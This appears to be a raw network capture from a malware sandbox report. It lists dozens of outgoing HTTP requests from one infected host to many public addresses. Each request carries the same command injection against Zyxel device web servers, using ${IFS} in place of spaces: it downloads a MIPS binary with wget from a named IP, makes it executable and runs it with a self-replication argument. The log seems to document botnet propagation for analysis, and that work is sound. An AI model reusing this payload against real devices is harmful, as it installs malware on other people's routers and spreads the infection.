                                            Feb 2, 2024 06:21:14.661235094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4826192.168.2.1552358150.77.141.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661253929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4827192.168.2.1536674209.127.188.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661319017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4828192.168.2.1558532114.111.47.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661355972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4829192.168.2.1559452111.82.168.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661382914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4830192.168.2.1537214210.16.109.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661446095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4831192.168.2.154323674.228.19.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661463022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4832192.168.2.1548980200.187.164.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661492109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4833192.168.2.154632249.87.55.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661533117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4834192.168.2.1551186209.168.234.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661566973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4835192.168.2.1545716147.205.5.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661592960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4836192.168.2.1534644146.223.160.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661633968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4837192.168.2.1541146172.143.245.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661654949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4838192.168.2.1556894180.31.93.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661715984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4839192.168.2.1548582189.82.213.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661744118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4840192.168.2.155682280.201.107.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661783934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4841192.168.2.1551228208.237.251.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661824942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4842192.168.2.154419838.215.210.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661861897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4843192.168.2.1553342129.161.139.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661916018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4844192.168.2.15544825.83.172.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661947966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4845192.168.2.155044257.131.164.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.661973953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4846192.168.2.154686089.105.171.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662017107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4847192.168.2.155504086.187.149.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662045956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4848192.168.2.1538540143.79.99.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662136078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4849192.168.2.1541042118.141.167.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662136078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4850192.168.2.154110471.41.223.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662199020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4851192.168.2.1534260157.218.186.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662246943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4852192.168.2.1541854156.105.170.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662281990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4853192.168.2.1542958211.145.103.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662333965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4854192.168.2.1541286204.158.180.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662364006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4855192.168.2.1554650203.126.165.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662416935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4856192.168.2.1547586116.57.46.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662470102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4857192.168.2.15399924.184.220.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662503004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4858192.168.2.1543566166.90.206.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662544012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4859192.168.2.155986869.16.103.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662550926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4860192.168.2.153660645.105.157.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662580013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4861192.168.2.15576125.57.12.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662621021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4862192.168.2.1542810133.97.215.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662666082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4863192.168.2.1540382156.111.43.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662689924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4864192.168.2.1548146199.182.159.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662708998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4865192.168.2.155202046.205.245.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662755966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4866192.168.2.1552042191.142.226.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662779093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4867192.168.2.154060014.185.49.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662815094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4868192.168.2.1544138208.93.219.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662853003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4869192.168.2.1544284218.96.106.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662890911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4870192.168.2.155994051.231.44.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662938118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4871192.168.2.153311280.59.188.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.662967920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4872192.168.2.154493232.119.171.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663009882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4873192.168.2.1553254129.83.151.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663037062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4874192.168.2.1553774198.63.107.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663063049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4875192.168.2.154455860.117.45.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663121939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4876192.168.2.1538800197.38.204.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663156033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4877192.168.2.1552980168.101.147.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663192034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4878192.168.2.155604269.159.197.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663228035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4879192.168.2.1548026122.19.243.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663260937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4880192.168.2.1553314141.205.79.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663288116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4881192.168.2.1559878128.88.141.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663321972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4882192.168.2.1553090185.81.182.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663353920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4883192.168.2.1559208119.25.72.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663395882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4884192.168.2.1553344170.97.29.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663431883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4885192.168.2.1554510173.43.106.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663453102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4886192.168.2.1543348156.74.150.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663496971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4887192.168.2.153761285.160.157.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663536072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4888192.168.2.1548904186.104.73.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.663578987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4889192.168.2.1555976148.49.214.59443
                                            TimestampBytes transferredDirectionData
